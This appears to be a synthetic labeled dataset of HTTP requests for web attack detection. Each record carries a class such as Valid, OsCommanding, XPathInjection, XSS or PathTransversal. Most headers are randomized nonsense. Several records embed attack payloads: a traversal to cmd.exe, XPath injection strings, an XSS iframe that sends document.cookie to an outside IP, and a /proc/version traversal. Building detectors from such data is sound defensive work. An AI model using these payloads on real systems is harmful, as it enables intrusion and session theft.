UA-Disp: 4810,493,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 106x833
Via: HTTP/1.2 www.gsniInl.gif:19, 9.2 www.iesxB7id.jpeg
Transfer-Encoding: deflate
Upgrade: oalaa/7.0, rhnhe/1.6, nkog/3.3
Warning: 720 202.193.20.146 "vzausimaegtuyuinei" "Mon, 07 Jul 08 14:32:11 UTC"
X-Forwarded-For: 152.55.56.249
X-Serial-Number: 7592797493312
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19673
Start - Id: 44250
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ghyeA.de
Connection: rD3eoa
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: E6nceutt-i0
Cache-Control: max-age=1302
Client-ip: 182.20.30.117
Cookie: s54iee9eqeu=giifat5el6ns;tChBiasai1sd4pn=ti$r;wmhet=A>Ot1Anb[;thSyiu08Lst=2;cumoy5qd=uiq;vohn=6185062697
Cookie2: $Version="31"
Date: Tue, 27 Jun 06 19:38:14 UTC
ETag: "tuLT6v@wLJeEsjmz"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Tue, 09 Oct 07 03:46:43 GMT
If-Unmodified-Since: Tue, 28 Dec 04 13:56:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 759
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM aXU3aWFyc3Nham9pQml5b2VudE5waXJhc2VjbWhhWGNrZG5lc2hlcg==
Authorization: Digest nonce
Range: 9644-,6569-1848
Referer: http://www.uoeyd3oh.biz/RxtRzu/rhtei5/nuncNoc/dtni/EtmNi4.ace
TE: trailers
Trailer: Range
User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 4.8; Uf-i7; rv:8.3.1) Gecko/12637687
UA-CPU: Sparc
UA-Disp: 220,5543,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: 6ris; osgnkcE=urwji
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 226 1.81.131.108 "aituhaeselhhae" 
X-Forwarded-For: 159.74.103.38
X-Serial-Number: 87791101469123011682
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44250
Start - Id: 48712
class: XPathInjection
PUT /a593epAihtg/3c9DKLjRjM/teDebebreOad6hai9lc/ns6Ac5iHcGTyS/ov6tanc1EtfidEto/A3NpFGkD/lRpF7AMuYZ5Il.p9/pxiOtESz_window.openXgxpassthruf/IAyesobnorr0aitIETsi.php? HTTP/1.1
Content-Length: 159
Content-Language: ytszn
Content-Encoding: gzip
Content-Location: http://www.teeiz.com/f47tgnsa.aspx
Content-MD5: Y3dndGN3bTBlYnNsMDJuaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Aug 05 19:13:37 CET
Host: www.4edgnt.it
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=652
Client-ip: 193.98.182.250
Cookie2: $Version="63"
Date: Wed, 23 Feb 05 18:36:12 GMT
ETag: "Rcq9up9t0BxEr6w1D"
Expect: dtchiks
From: 0Czsri@otpu.uk
If-Modified-Since: Fri, 08 Jan 10 01:14:56 CET
If-Unmodified-Since: Sun, 25 Jan 09 24:06:23 GMT
If-None-Match: "-Gxu@QvhvrzGkVVflv"
If-Range: "G8RnKaGwBXBPX_hi"
Max-Forwards: 02
Pragma: no-cache
Proxy-Authorization: hrda i93os=hoee
Range: -4,59993-18,28-7301
Referer: /Hkowt/alap/erpmxe/mJdm.png
TE: chunked,trailers
User-Agent: b9wn (epTuc@hUm7; lWqtwH)
UA-CPU: MIPS
UA-Pixels: 181x2087
Via: HTTP/4.3 137.218.36.224, 6.6 www.eto3l.shtml
Transfer-Encoding: arinh; r4rSt=raiie
Upgrade: aer/1.4, ieE/6.5, hbq/3.1
Warning: 304 35.153.85.164 "bwrprqh8l3usts" 
X-Serial-Number: 586508390592927979

oeefaAd9eut2o=5923&sheibei=3 or   1<  i/eoiat2/ecSe0e/child::text()[position()=801]   or 731='] | /* | /foo[bar='

End - Id: 48712
Start - Id: 2535
class: Valid
GET /t4robzebsess/nTiL4uX.rezEvS/c-HiJ_HF@wwQ8-@r.tiff?4t=6820699&Aalsi5-_VN9W=ete5sTh+i%3El2b&XV2uIeRQH=7sH37inseie&BvroptwIV=4&mitARhxhyu8=+oyOe&Munion.z7jdocuments=dDt0t6UnLl2M HTTP/1.0
Host: www.siissr.cz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: i8pcspUg-b, eeic-ri;q=0.2, obkfstha-ai;q=0.2, mnso1-rtdkodnQ;q=0.4
Cache-Control: only-if-cached
Client-ip: 223.190.238.176
Cookie: Emizsr=dtfnc
Cookie2: $Version="1"
Date: Sun, 25 Jan 04 11:51:16 UTC
ETag: W/"CGtJpAfe3oXQUIVHoSX"
Expect: 100-continue
From: nnxgy@Ttnc1ez.uk
If-Modified-Since: Fri, 10 Apr 09 15:59:10 UTC
If-Unmodified-Since: Wed, 14 Oct 09 07:33:07 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 07 May 07 19:24:19 UTC
Max-Forwards: 18
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/tlsstete/Eaolaro/6wsnstto.shtml
Authorization: Basic ZWNvdHA6ZWVrbkVlcw==
Range: 05-
Referer: http://hap6nto.org/calerid/xbtesm/oa8re/etuarer/toetelsf.txt
TE: deflate;q=0.0
Trailer: Referer
User-Agent: Mozilla/9.4 (compatible; MSIE 7.5; Mac OS X; hanre4s; Tfzr0i; 0uIo7ap)
UA-CPU: MIPS
UA-Disp: 284,569,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1559x1634
Via: 1hfhr/3.2 www.ev1ee.css, FTP/2.8 www.i0suo3.png:3915
Transfer-Encoding: gzip
Upgrade: bae/3.4
Warning: 301 www.naet.js "Hsh2meee5a" "Sat, 22 Apr 06 15:10:43 UTC"
X-Forwarded-For: 8.183.220.41
X-Serial-Number: 37492980490
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2535
Start - Id: 12119
class: Valid
GET /tWO4mD@wm-Gk5tQnwj/bSU_@z.ky/epasswd7execcatgzqT/setDrbwmku/Za/U9/eslhSA/osm7slqnistoesRn/eT8E/7kyYxEME0rJzp0gn.htm?reiocstceim=a1bdzlyMhAhotBbnao&thruFl=%2Fs%27lee%5C%3A+o%3Bdbm&748iJLAk.u=atlaow5pst8&ou2p3eaaniktEb=sgEmr9s6&uqcopyEvk=imLAmU2&modHrsn=nr1exk3eimg%28seen%3Ci%7C&eddedeogapUa=781418243 HTTP/1.1
Host: 105.74.249.4
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: compress, identity;q=0.5
Accept-Language: uucyahsw-rhdlj
Cache-Control: only-if-cached
Client-ip: 92.187.253.162
Cookie: nsm079=347949;aelqE96lsseonbe=hmia:scriptf/=\=ree g 
Cookie2: $Version="222"
Date: Thu, 24 Feb 05 09:52:27 CET
ETag: W/"m4kMhaJSuJn1SXDt9"
Expect: 100-continue
From: 1ygx3rl@zebdo07.net
If-Modified-Since: Wed, 16 Nov 05 20:51:50 GMT
If-Unmodified-Since: Sun, 30 Sep 07 19:47:33 CET
If-Match: "rAjATJ9HHH8V1Vj"
If-None-Match: *
If-Range: Fri, 18 Nov 05 13:18:26 CET
Max-Forwards: 1522
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="xstlatiN"
Authorization: NTLM NmltbTNnbmU0YXRnZm9mdHJ0bG9zaW5kcjZMYTBBNm9kT2llaW9zb3NhZWVwb2M5
Range: 2-
Referer: http://i2Wtai.biz/ejiertHt/tnHqslr/oTtsvrAn/entaaoc.php
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/0.9 (compatible; MSIE 5.5; Linux i386; 6zoGaaohie; tdca7oza42)
UA-CPU: MIPS
UA-Disp: 3494,5887,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 556x8407
Via: FTP/9.7 www.Nq7tmrn.shtml, 7.5 www.ahic6o.gif, FTP/9.4 49.62.119.58:9
Transfer-Encoding: 3o6Ob
Upgrade: Cdr/9.5, gton/2.2
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 192.179.67.70
X-Serial-Number: 572256
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12119
Start - Id: 23819
class: Valid
GET /yb6v1j./uE/copyr.htm?h@5T=60&wszanrubik4tdg=8&uhtergg0iothySi=d0ovu4pn2&OTorGzWYobjectW37=uts&orztiso=65277&eeE=ee&C_vYUKc=e%40i&qauc6iaNcHu=6siTo%3DanLs&ieuncllu=r-Py3Kqs8&or3ciibhl=5&leentEloit=nlfE%40JE&aAprof=036867&t3hv4e5scaieehU=eehtd&uAsoehm=59870&oENtuinr=cgthsd1kmei HTTP/1.0
Host: 142.42.174.56
Connection: close
Accept: image/gif
Accept-Charset: big5, windows-1258;q=0.3, iso-2022-jp
Accept-Encoding: *
Accept-Language: ybntslo-duy;q=0.3
Cache-Control: no-store
Client-ip: 1.109.180.253
Cookie: 7KyPN3K.5=ramKReaAdVkz;9t8eriR6aeee=ennae6xihtnowadtd;8XK-DUckv=2
Cookie2: $Version="72"
Date: Thu, 09 Apr 09 13:24:17 CET
ETag: W/"c3auPaoTzSyucQxi1N_"
Expect: iste5
From: dhmtihz@kNxat8.be
If-Modified-Since: Mon, 06 Mar 06 10:25:56 GMT
If-Unmodified-Since: Wed, 07 May 08 21:08:22 UTC
If-Match: "KmZGqQj@jxYDHdc"
If-None-Match: *
If-Range: Fri, 20 Oct 06 24:49:20 UTC
Max-Forwards: 4
MIME-Version: 8.6
Pragma: r=tw9achs
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: Digest username="oledse"
Range: 162-,809795-
Referer: http://Nsrtiu.be/tuctoq/Rind/peo0hrti/qwctd.wav
TE: gzip;q=0.9,trailers,chunked
Trailer: Connection
User-Agent: Mozilla/8.8 (Windows; U; Windows NT 9.9; eh-ho; rv:7.7.0) Gecko/87394596
UA-CPU: PowerPC
UA-Disp: 873,2012,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4203x994
Via: 8.1 158.234.138.7, HTTP/6.0 www.roi3n.png, 2.2 77.188.251.101
Transfer-Encoding: gjwd
Upgrade: rae/8.5, ne4/3.3, e4ck/8.2, 0teaus/2.2
Warning: 430 www.eLse.jpeg "spnnieaetrdru" "Tue, 30 Sep 08 02:07:35 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 370786959520494
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23819
Start - Id: 29541
class: Valid
GET /isaosdeh/4PVCBXj/BhtpassoLupdatecopyRu0a@IpiW/etcm24j/rbJP0hxVpV55e/cpewnIecn4foh/zpyRFWRfqK.asmx? HTTP/1.1
Host: 169.52.46.231:5
Connection: uctpx
Accept: text/*;q=0.4, audio/basic
Accept-Charset: windows-874;q=0.2
Accept-Encoding: *
Accept-Language: a5joen-a, tfhqo-kreE7i
Cache-Control: no-cache
Client-ip: 199.216.21.216
Cookie: uavitaGg=70858;nb4eg6ra2=btnetcatv;as=d0tZ6;Aod3dkphe=de HlCl
Cookie2: $Version="17"
Date: Sat, 01 Apr 06 09:28:49 CET
ETag: "e6j.ieGuWuJaBrxB9VF"
Expect: awianDu=fnketir;ruzioroe
From: rain@uiqt.com
If-Modified-Since: Tue, 15 Jun 04 20:53:09 GMT
If-Unmodified-Since: Thu, 14 May 09 08:33:52 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 29 Oct 08 07:46:24 GMT
Max-Forwards: 35
MIME-Version: 6.1
Pragma: ica4tt='r'
Proxy-Authorization: NTLM dHZ1YWRsbHI4ZWFzbGFzb21peTRuUG9uT2VvZGNkcmRwdEZlaDI5b0ViYWFpZDg=
Authorization: Digest opaque="6waerney"
Range: 577564-305453
Referer: http://or2de.net/uleo.jsp
TE: gzip
Trailer: Upgrade
User-Agent: wBuBuIO http://www.Aedim6r.cz
UA-CPU: StrongARM
UA-Disp: 496,778,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3909x9569
Via: FTP/6.0 www.irem.shtml
Transfer-Encoding: compress
Upgrade: esen47/9.3, o2g/8.8, eeLM/5.1
Warning: 366 163.128.154.181 "5ioUq" 
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 935852027842714359
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29541
Start - Id: 48078
class: XSS
GET /sDDGub/rc/wJ6k/eGHS2S5@D2P16EzM/iBzaDNzAQadUhtafGdG/eprGTBgLwKUx7ON02Dy-/o6nfTretjseebhsed/oMp3F0-_Cg7.htm?oa=eeNljiurdeiOz&iheihlhecewtol=a&dfne8nnstsg=%3Ciframe++++src+%3D+%22+++vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F116.56.229.70%2Fto.cfm%27%2Bdocument.cookie%29%3B%5D++++++%22++%3E&qRh2H@htpass=9&BciRhhrSuvH=aL. HTTP/1.1
Host: 224.172.22.94:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, identity, identity, identity, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 151.8.225.81
Cookie: oeaeeqomtnShEdt=ek3;yfehatitadK=hdn8ecrp;pvslu2Eatt1Dt=8738;asoMl=3;8s=cua:
Cookie2: $Version="5"
Date: Sat, 24 Nov 07 03:35:59 GMT
ETag: "U9-YQ6G4Lm_.cAH"
Expect: 6b3s=wacwl;nniqh=tatr
From: pr43lq@7remye.cz
If-Modified-Since: Sat, 16 Dec 06 01:52:14 CET
If-Unmodified-Since: Mon, 15 Nov 04 24:06:42 CET
If-Match: *
If-None-Match: "Nvg0jxTzLr-Gcr9.lw"
If-Range: *
Max-Forwards: 25
MIME-Version: 2.5
Pragma: hroea5r=rbt6
Proxy-Authorization: Digest nonce
Authorization: Rucfn yksNds=e8tWg
Range: 5052-
Referer: /mtnniY/dnrea5p9.tiff
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.8 (Windows; U; Win98 3.7; pm-ej; rv:1.6.6) Gecko/43555922
UA-CPU: StrongARM
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: OoR/7.2 77.231.65.186
Transfer-Encoding: gzip
Upgrade: urlbSi/7.2, soAe/2.2, syle/8.0
Warning: 125 99.127.238.144 "ioisG0" "Sun, 22 Oct 06 11:55:13 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48078
Start - Id: 46419
class: PathTransversal
GET /ftpb/hRP8/ekbn8LY7ug./hlEd1uhChuxh.exe?FX02YGY_ovar=6617&rttpnf=237&Ne=fOiimt9ehtso&hal5cras=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&bAeDwiteeftnmn=68&5-uY7fPS-=%7Es&q8jle=i%292samgshutdown&onemptrhnt=48&8varaFxgO=o&RLnikbonb2qekd=jSEacNnMufM&8aT=219023&ieccoonsh=oroia3enih8gt&cdnreudphtuneo=t7nGnnenslprnv HTTP/1.1
Host: www.imdatei.com
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: isiri-3342;q=0.0, windows-1251;q=0.4, iso-8859-1, koi8-r
Accept-Encoding: compress;q=0.3, gzip;q=0.9, identity;q=0.0, gzip
Accept-Language: Eoazs-aThr3;q=0.6, bihiicnb-l;q=0.8, m-Lnzoi1, iTbsnd-eLli, ze-a9rdts5;q=0.8
Cache-Control: no-cache
Client-ip: 246.216.165.119
Cookie: nudaDssseaRindr=aamtna<'f
Cookie2: $Version="1"
Date: Fri, 20 Oct 06 07:46:44 GMT
ETag: "7F80YTH_JJbucQ6@88o"
Expect: 100-continue
If-Modified-Since: Thu, 23 Jul 09 19:54:20 CET
If-Unmodified-Since: Wed, 21 Apr 04 06:25:15 CET
If-Match: "cswTilLOxwbu5e5"
If-None-Match: ".RpAnNR_VQY1BZ-HZE9"
If-Range: Thu, 24 Jun 04 10:45:35 GMT
Max-Forwards: 768
MIME-Version: 1.3
Pragma: emse5ea=t
Proxy-Authorization: Basic NWNzdDo3d0Q1bGVk
Authorization: sfws er9q=Anee9o
Referer: http://ool9e.de/rw5w/eZdver/tpighee/5drh.bin
TE: gzip;q=0.5,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/5.9 (Windows; U; Win98 5.1; 6y-ar; rv:6.7.1) Gecko/75118637
UA-CPU: x86
Via: 6.7 18.241.132.150, FTP/7.2 183.79.25.16:01
Transfer-Encoding: gzip
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 543 208.43.170.15 "hd5o7soouee3cviemc" 
X-Forwarded-For: 80.80.233.157
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46419
Start - Id: 20974
class: Valid
GET /ds3nknlarcoenKgal6/Y8h12DNe./nSm.css?nOb0haNe2m=f+sytd2Iem%27+%25c&1whol=acceptB+wutwnl HTTP/1.0
Host: www.r8siiI.ch
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: xsr-dmc
Cache-Control: min-fresh=10
Client-ip: 118.110.105.174
Cookie: exfTcvf=h2<tere1dmha;0cg=otemda7ebeeami;mNueet=dQHL0;ckctttac= nO0body r(wg>iner;ee=325;brh2dtsnnmlnqdt=71550824
Cookie2: $Version="6"
Date: Sun, 22 Oct 06 01:17:46 CET
ETag: W/"WzYc2l.lXp4XZd5i"
Expect: enii1Rn=icktpe
From: stnsist@ee8nh.de
If-Modified-Since: Wed, 23 Sep 09 20:55:15 CET
If-Unmodified-Since: Fri, 10 Sep 04 23:39:34 GMT
If-Match: "NzRSlOPN1@76ub@x"
If-None-Match: *
If-Range: *
Max-Forwards: 821
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic ZW9sVnRhdGU6Y05jeXllbg==
Authorization: eeudni ixyGtloo=8xxUtNiE
Range: 8-7,-0713,855020-
Referer: /dres/elraaoea.txt
TE: trailers,chunked;q=0.3
Trailer: Authorization
User-Agent: atlaO (w8tl7JL; hEmFrfhc5; w2_KXM41)
UA-CPU: 68000
UA-Disp: 3276,4561,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 212x4647
Via: HTTP/0.8 www.acebaN.shtml, ecaso/6.0 207.149.244.163
Transfer-Encoding: deflate
Upgrade: wrn/1.7, tal/7.3, xhsnbh/3.1, taut/3.1
Warning: 786 163.16.67.68 "tcetecex" 
X-Forwarded-For: 36.101.205.182
X-Serial-Number: 70412595449023727026
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20974
Start - Id: 4974
class: Valid
POST /BdyD2pmw/Ji2buscriptdNJrP/lL1.html? HTTP/1.1
Content-Length: 83
Content-Language: euqri
Content-Encoding: identity
Content-Location: http://www.anen.st/erupnjc/Oylfna/l5g7.cfm
Content-MD5: cmh0ZXVvaWlhb2FpYW03ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Mar 07 20:07:20 CET
Last-Modified: Wed, 24 Jan 07 16:54:17 UTC
Host: 192.3.234.100:80
Connection: close
Accept: application/zip, image/*;q=0.3
Accept-Charset: x-mac-korean;q=0.2, windows-1251, windows-874;q=0.1, iso-8859-9
Accept-Encoding: gzip, deflate;q=0.6
Accept-Language: i-ebqPdw;q=0.5, ebi-reeewoh;q=0.6, pKmm6o-out6t;q=0.8
Cache-Control: no-store
Client-ip: 9.237.108.60
Cookie: El7Z=tnntxp_ishutdownl16d
Cookie2: $Version="1"
Date: Fri, 07 Jul 06 15:25:54 UTC
ETag: "E6Q_HzRmW4MH.Tv2NR-"
Expect: 100-continue
From: zqhtasa7@rsaljt.it
If-Modified-Since: Mon, 10 Nov 08 07:40:03 GMT
If-Unmodified-Since: Sun, 15 May 05 02:59:59 UTC
If-Match: "C8RgJ@YVOJEii2YbB"
If-None-Match: "fDkoDgN2U8Ysp9ED3"
If-Range: Wed, 03 Dec 08 04:11:13 UTC
Max-Forwards: 9
MIME-Version: 8.6
Pragma: nuiea='rstn'
Proxy-Authorization: NTLM eWxvbHNtZTZJYklvZXRuN3lyNkhyemF3ZXN3RWVkdGJqM3NrZzNl
Authorization: NTLM ZW90dGl0Zm5lcndsZG5zRWdoN3Flc2Ewc2U4SGk3aG1yb3MzbnJMbGY=
Range: 500-
Referer: /wihcto/kjeyht2.tar
TE: chunked;q=0.6
Trailer: From
User-Agent: iu77etMov/1.6.4
UA-CPU: Sparc
UA-Disp: 1425,8375,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 527x0259
Via: 4.0 208.209.204.9, 6.7 www.sa7spqh.tiff, 7.9 www.rHt0k.gif
Transfer-Encoding: iechsi
Upgrade: 2tkN/0.3, i2absA/1.0, acAai/6.3, dhvEm/4.4, os7/0.6
Warning: 173 28.187.74.144 "intyt8" "Wed, 16 Jan 08 01:05:54 UTC"
X-Forwarded-For: 26.142.203.81
X-Serial-Number: 3100317318115604683
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iho=Rag+3lnt&m6s=577730678&ia7llTat1etrT=erpdcehioeus&phgwt=usrxWiaStc~e/2ehq

End - Id: 4974
Start - Id: 4337
class: Valid
POST /kPsUt9K8yGn3x8.html? HTTP/1.0
Content-Length: 121
Content-Language: bi3
Content-Encoding: gzip
Content-Location: /naoasen3.ace
Content-MD5: c2xlZWRldTVsZXJ1czd4bw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Jan 06 21:18:57 GMT
Last-Modified: Thu, 07 Jan 10 11:01:48 UTC
Host: 93.131.184.142
Connection: xcsrc
Accept: */*
Accept-Charset: koi8-r, utf-7;q=0.7
Accept-Encoding: compress, identity;q=0.0, gzip;q=0.8, compress;q=0.1, compress;q=0.0
Accept-Language: qck-ews;q=0.3, xoahtetn-Ob;q=0.0, pTmlofas-u4eio, hes-3eoE;q=0.5
Cache-Control: no-transform
Client-ip: 11.10.170.69
Cookie: Zw3iconnectPPuItf9=141;4obhne=5378
Cookie2: $Version="0"
Date: Mon, 17 Dec 07 11:34:05 CET
ETag: W/"GXGK-.REYw4zTvKw"
Expect: 100-continue
From: id5ctk@IaeO2.uk
If-Modified-Since: Sat, 27 Nov 04 07:17:53 UTC
If-Unmodified-Since: Sun, 27 Sep 09 06:18:54 CET
If-Match: "NNyXPQZ3kk7Ktm4j3"
If-None-Match: *
If-Range: "yKYqoM0ALUZ1A9X"
Max-Forwards: 22
MIME-Version: 1.0
Pragma: skrdetat=ci5o
Proxy-Authorization: Digest nonce
Authorization: NTLM Q1RvcDZzYW9ucWJkZWduaGVheXRjZldldHN1Z2VmYXRvaWVlaQ==
Range: 45370-03,2-266951,-79688
Referer: /logngs1H.php
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/7.1 (Windows; U; Win98 1.2; tl-Qc; rv:2.1.5) Gecko/45320824
UA-CPU: x86
UA-Disp: 564,954,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8501x1867
Via: 8.9 112.51.238.197:0999
Transfer-Encoding: gzip
Upgrade: esgn/6.8, ei1l/5.1, redat/5.0, 10g/8.4
Warning: 980 www.Rrmnetut.css:6 "sOlpsziur" "Wed, 25 Mar 09 01:43:09 GMT"
X-Forwarded-For: 184.207.120.162
X-Serial-Number: 558161197485765584
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ocmdxxtm=okytT-yUywlQ&xy4cg=%addfn5[ <bes&betweenCxgpcST=000&BAEJ3SI4tJO=ttrenae8el;moUw&o1smqd=ineptaqsr4lsdmAna

End - Id: 4337
Start - Id: 1687
class: Valid
GET /flJS/eR@8Md/oel5teyved/dFo0/LfromanNtHvaccess_logCf/eXDMUezdpnS1NN7.e.htm?nCa6=otue HTTP/1.0
Host: www.gnasO.cz:26
Connection: close
Accept: */*;q=0.7
Accept-Charset: us-ascii, x-mac-arabic, macintosh;q=0.3, utf-7, x-mac-hebrew;q=0.8
Accept-Encoding: *
Accept-Language: tesrha-i;q=0.8
Cache-Control: min-fresh=835
Client-ip: 170.241.66.105
Cookie: dhforrhai=38813;ysairClsa=3277;tgspiyess=dsKgeo;wye=gtr;aoe=D91antteucqei;rt=x7Lneu_kLL.Z
Cookie2: $Version="033"
Date: Mon, 20 Apr 09 24:20:42 GMT
ETag: W/"Guq8N-HdhkeH6XJ1-_"
Expect: oeontso=mhebs;aosd=0gc1px
From: iNaNl@nioce.ch
If-Modified-Since: Tue, 30 Dec 08 03:22:16 GMT
If-Unmodified-Since: Fri, 17 Jun 05 11:37:22 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Aug 06 24:41:06 GMT
Max-Forwards: 0
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest username="o3aarj"
Authorization: mt4rn e5uawb=hagna
Range: 73-
Referer: http://cgx2atae.uk/rak4/aueeedeH/ardt.sh
TE: chunked,trailers,trailers
Trailer: Expect
User-Agent: o5zMdexae
UA-CPU: StrongARM
UA-Disp: 257,6505,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3865x207
Via: FTP/1.4 13.27.43.58, 1.1 78.92.97.26
Transfer-Encoding: identity
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 300 92.186.4.96 "i1U7e" "Sat, 28 Feb 04 05:11:20 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 3355979393710804862
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1687
Start - Id: 49331
class: XPathInjection
GET /aeU3P_-/rWa.php3?cfer=ketyst%2Fjyo%2FooINd%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D104%5D++%7C+++seetc%2Foot%2FrG2t%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D7%5D++++or++++%27Pu%27%3D++%27&ahtf2e=26&5indon=a%2Bo7wm&tae7ore=e0Ydddz&n2ned=svi5tva2&2snoifsoop=3 HTTP/1.0
Host: 189.39.65.162:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.8, compress;q=0.2, deflate, identity;q=0.2
Accept-Language: laug-j2apao;q=0.2, ahtltdfn-tooclpo;q=0.9
Cache-Control: max-age=13
Client-ip: 23.148.126.23
Cookie: ae=0
Cookie2: $Version="94"
Date: Sun, 17 Oct 04 19:16:41 GMT
ETag: "f-78hbGcyMFOKmfms"
Expect: tpfss
From: 5sny@toesr.uk
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Tue, 01 Aug 06 14:42:06 CET
If-Match: "t822JRwHWPmseRP9"
If-None-Match: *
If-Range: "TG60.2S9uFo5UNOb7qoX"
Max-Forwards: 88
MIME-Version: 6.3
Pragma: ee5rhcb='se'
Proxy-Authorization: artrps eibl=2ExpiAa
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: /WoAefbtt.txt
TE: trailers,trailers,trailers
Trailer: From
User-Agent: lntdnu
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: FTP/4.0 52.34.47.45, 7.1 121.74.44.36, HTTP/6.5 97.119.16.227:45
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 906 www.mgsdP.jpg "luEthgfredan" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 6608359
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49331
Start - Id: 20957
class: Valid
GET /Gehtpassj@6/aH6_bHXvL12p/oso/tvarrJn8cWO5QNv/es/2eDNx5eRomIAAmW/n3nmaaoka.exe?ieheufhao=754366&grr=u%3Ar%7E+l5zaijaavbscripteservicesg&0dqDg3TO@3=23221&onmmvvyy5bA5=iESO HTTP/1.1
Host: 119.192.131.236
Connection: 7nsl
Accept: image/*;q=0.6, video/*;q=0.1
Accept-Charset: x-mac-arabic, utf-8, iso-8859-15;q=0.8
Accept-Encoding: identity;q=0.3
Accept-Language: hd94ro-3xr0;q=0.4, mnce-del8w, anet-llo2r;q=0.5, p9apob-l;q=0.6, tEfu-5doovi;q=0.1
Cache-Control: only-if-cached
Client-ip: 95.153.52.209
Cookie: Uelrhnjanyssacn=i-;MmEiframeyxQX1N=yaEE68
Cookie2: $Version="4"
Date: Tue, 26 Dec 06 10:35:48 UTC
ETag: "hes6V5xyQxH53Ap"
Expect: 100-continue
